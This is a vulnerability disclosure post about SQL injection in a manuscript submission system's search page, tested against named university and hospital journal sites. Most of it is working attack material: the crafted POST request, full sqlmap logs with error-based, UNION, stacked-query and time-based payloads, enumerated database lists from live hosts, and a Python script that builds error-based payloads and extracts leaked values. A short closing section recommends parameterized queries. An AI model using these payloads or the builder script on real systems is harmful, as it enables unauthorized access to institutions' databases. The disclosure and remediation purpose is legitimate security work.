Generic SQL injection vulnerability in a manuscript submission system (affecting many enterprises and universities)

Source: Internet
Author: User
Tags: sybase, web server, operating system, microsoft iis

A web search turns up many sites running this system's search page (/web/keysearch.aspx). A few of them were tested with the following request:

POST /web/keysearch.aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pai_lasttime=1410760097025; pai_count=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

Author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Case 1: Hunan University http://dxjykx.cnmanu.cn/


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), NULL-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; WAITFOR DELAY '0:0:5'-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' WAITFOR DELAY '0:0:5'-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=查询&keyword=assd%' AND 4223=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=查询&keyword=assd%' UNION ALL SELECT 78, 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88)+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 4163=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4163=4163) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69)+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 78-- 
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>

[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

[13:41:08] [INFO] testing if current user is DBA

Current user is DBA: False

[13:41:08] [INFO] fetching database names

[13:41:08] [INFO] the SQL query used returns 59 entries

Available databases [59]:

[*] Bl

[*] Cdxxgc

[*] Cg

[*] Cghy

[*] Cy

[*] Cymx

[*] D1

[*] Demcom

[*] Demo

[*] Dj

[*] Dxjykx

[*] Eye

[*] Gjzhyx

[*] GuaHao

[*] Hh

[*] Hhzrkx

[*] Hlgl

[*] Hnxbyx

[*] Hxyqdz

[*] J4e

[*] Jjyx

[*] Lcjsyx

[*] Lcjyzzs

[*] Lcsjbx

[*] Lcsjwk

[*] Lnyxybj

[*] Main

[*] Master

[*] Mfskin

[*] Model

[*] Mrzxwk

[*] Msdb

[*] Mz

[*] Mzyfs

[*] Njsd

[*] Nky

[*] Northwind

[*] Nxgb

[*] Nydxxb

[*] Pifu

[*] Pubs

[*] Rfic

[*] SMS

[*] St

[*] Sypfb

[*] Tempdb

[*] Test

[*] Wcbx

[*] Wf

[*] Wlxb

[*] Xdx

[*] Xhnj

[*] Xjyx

[*] Xnxyxb

[*] Yxjz

[*] Zdblx

[*] Zjyx

[*] Zr

[*] Zxy.pdf



[13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\Output\dxjykx.cnmanu.cn'



[*] Shutting down at 13:41:08
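The error-based payloads above are worth unpacking, because they explain both why every working payload begins with %' and how sqlmap reads the answer back out of the page. The following Python is an added example, not part of the original report and not sqlmap's own code: it decodes the CHAR() marker chains copied from the Case 1 and Case 3 payloads (sqlmap's random markers :mip:/:sau: and :hwr:/:nwt:), rebuilds the payload shape, renders it into an assumed LIKE-based query, and pulls the leaked 1/0 out of a constructed SQL Server error message. The query template, table and column names are assumptions inferred from the %' prefix and AND '%'=' suffix of the payloads; the page never shows the application's source.

```python
import re

# CHAR() chains copied from the page's sqlmap payloads. sqlmap wraps the value it
# wants to leak between two random markers so it can find it in the response;
# Case 1 and Case 2 use one pair, Case 3 another.
CASE1_PREFIX = "CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)"
CASE1_SUFFIX = "CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)"
CASE3_PREFIX = "CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)"
CASE3_SUFFIX = "CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)"

# Assumed query behind /web/keysearch.aspx: the page never shows the source,
# but the "%'" prefix and "AND '%'='" suffix of every working payload only make
# sense if each field is pasted into a LIKE '%...%' pattern. Table and column
# names are placeholders, not taken from the page.
ASSUMED_TEMPLATE = (
    "SELECT TOP 100 * FROM Manuscripts WHERE author LIKE '%{author}%' "
    "AND keyword LIKE '%{keyword}%' AND title LIKE '%{title}%'"
)

_CHAR_RE = re.compile(r"CHAR\s*\(\s*(\d+)\s*\)", re.IGNORECASE)


def decode_char_chain(expr):
    """Turn a T-SQL CHAR(n)+CHAR(m)+... concatenation into the string it builds."""
    return "".join(chr(int(code)) for code in _CHAR_RE.findall(expr))


def render_vulnerable_sql(author, keyword, title):
    """What the server executes if it builds the query by string concatenation."""
    return ASSUMED_TEMPLATE.format(author=author, keyword=keyword, title=title)


def error_based_payload(prefix_expr, suffix_expr, condition, nonce):
    """Rebuild the page's error-based payload for a field inside LIKE '%...%'.

    CONVERT(INT, ':mip:1:sau:') always fails, and SQL Server quotes the
    offending varchar in its error text, so the CASE result (1 or 0) between
    the markers tells the attacker whether `condition` held. The trailing
    "AND '%'='" re-balances the quotes against the template's closing "%'".
    """
    return (
        f"1%' AND {nonce}=CONVERT(INT,(SELECT {prefix_expr}"
        f"+(SELECT (CASE WHEN ({condition}) THEN CHAR(49) ELSE CHAR(48) END))"
        f"+{suffix_expr})) AND '%'='"
    )


def extract_leaked_value(response_body, prefix_expr, suffix_expr):
    """Response side of the technique: return whatever sits between the decoded
    markers in the page, or None if the database did not echo them back."""
    prefix = re.escape(decode_char_chain(prefix_expr))
    suffix = re.escape(decode_char_chain(suffix_expr))
    match = re.search(prefix + r"(.*?)" + suffix, response_body, re.DOTALL)
    return match.group(1) if match else None


# Constructed sample of a SQL Server 2000 conversion error leaking into an
# ASP.NET error page (the wording differs between SQL Server versions).
SAMPLE_ERROR_RESPONSE = (
    "<title>Syntax error converting the varchar value ':mip:1:sau:' to a column "
    "of data type int.</title>"
)


if __name__ == "__main__":
    print(decode_char_chain(CASE1_PREFIX), decode_char_chain(CASE1_SUFFIX))
    payload = error_based_payload(CASE1_PREFIX, CASE1_SUFFIX, "9293=9293", 9293)
    print(render_vulnerable_sql(payload, "assd", "wolf"))
    print(extract_leaked_value(SAMPLE_ERROR_RESPONSE, CASE1_PREFIX, CASE1_SUFFIX))
```

Run it directly to print the decoded markers, the rendered query and the leaked bit. During detection the CASE expression yields 1 for a true condition; during enumeration sqlmap places the value it wants (a database name, for instance) between the same markers, so whole strings come back in a single response, which is why the 59 database names in Case 1 arrive at once. The time-based payloads (WAITFOR DELAY '0:0:5') answer the same yes/no question with a five-second delay instead of error text and have to be asked once per bit, which is why Case 2, where only the time-based and stacked techniques worked, needed tens of seconds per database name.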



Case 2: Renji Hospital, Shanghai Jiao Tong University School of Medicine, http://www.cjge-manuscriptcentral.com



D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:25:16

[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'd:\Python27\sqlmap\output\www.cjge-manuscriptcentral.com\session' as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'Microsoft SQL server 100' from session file
[13:25:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1'; WAITFOR DELAY '0:0:5';-- AND 'enfs'='enfs&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1' WAITFOR DELAY '0:0:5'-- AND 'exwq'='exwq&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
---

[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx

The enumeration does not need to run to completion. Only the time-based and stacked techniques work on this host, so every name is pulled out one character at a time through WAITFOR delays (tens of seconds per name, as the timestamps show); retrieving the database names is already enough to demonstrate the vulnerability.



Case 3: China cosmetic and orthopedic journal mr.cnmanu.cn

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 7683=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' UNION ALL SELECT 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71)+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%'; WAITFOR DELAY '0:0:5'-- 

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' WAITFOR DELAY '0:0:5'-- 

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=查询&keyword=assd%' AND 2981=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (2981=2981) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=查询&keyword=assd%' UNION ALL SELECT 41, 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=查询&keyword=assd%'; WAITFOR DELAY '0:0:5'-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=查询&keyword=assd%' WAITFOR DELAY '0:0:5'-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 6529=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6529=6529) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' UNION ALL SELECT NULL, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CHAR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; WAITFOR DELAY '0:0:5'-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' WAITFOR DELAY '0:0:5'-- &butSearch=查询&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>

[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

[13:40:55] [INFO] testing if current user is DBA

Current user is DBA: False

[13:40:55] [INFO] fetching database names

[13:40:55] [INFO] the SQL query used returns 59 entries

Available databases [59]:

[*] Bl

[*] Cdxxgc

[*] Cg

[*] Cghy

[*] Cy

[*] Cymx

[*] D1

[*] Demcom

[*] Demo

[*] Dj

[*] Dxjykx

[*] Eye

[*] Gjzhyx

[*] GuaHao

[*] Hh

[*] Hhzrkx

[*] Hlgl

[*] Hnxbyx

[*] Hxyqdz

[*] J4e

[*] Jjyx

[*] Lcjsyx

[*] Lcjyzzs

[*] Lcsjbx

[*] Lcsjwk

[*] Lnyxybj

[*] Main

[*] Master

[*] Mfskin

[*] Model

[*] Mrzxwk

[*] Msdb

[*] Mz

[*] Mzyfs

[*] Njsd

[*] Nky

[*] Northwind

[*] Nxgb

[*] Nydxxb

[*] Pifu

[*] Pubs

[*] Rfic

[*] SMS

[*] St

[*] Sypfb

[*] Tempdb

[*] Test

[*] Wcbx

[*] Wf

[*] Wlxb

[*] Xdx

[*] Xhnj

[*] Xjyx

[*] Xnxyxb

[*] Yxjz

[*] Zdblx

[*] Zjyx

[*] Zr

[*] Zxy.pdf



[13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\Output\mr.cnmanu.cn'

[*] shutting down at 13:40:55

Note that this database list is identical to the one obtained in Case 1 (the same 59 entries): the journals hosted under cnmanu.cn share a single SQL Server instance, so an injection in any one journal's search page exposes every journal's data on that server, not just the journal being tested.

 

Solution:

The fix is straightforward. The %' prefix and AND '%'=' suffix of the working payloads show that the search handler behind keysearch.aspx concatenates the author, keyword and title POST fields directly into LIKE '%...%' patterns. Add global filtering of POST parameters as a first, quick measure, and replace the string concatenation with parameterized queries (SqlParameter bindings on the SqlCommand in ADO.NET) so that user input is never parsed as SQL; filtering alone is a stop-gap, parameterization is the actual fix.
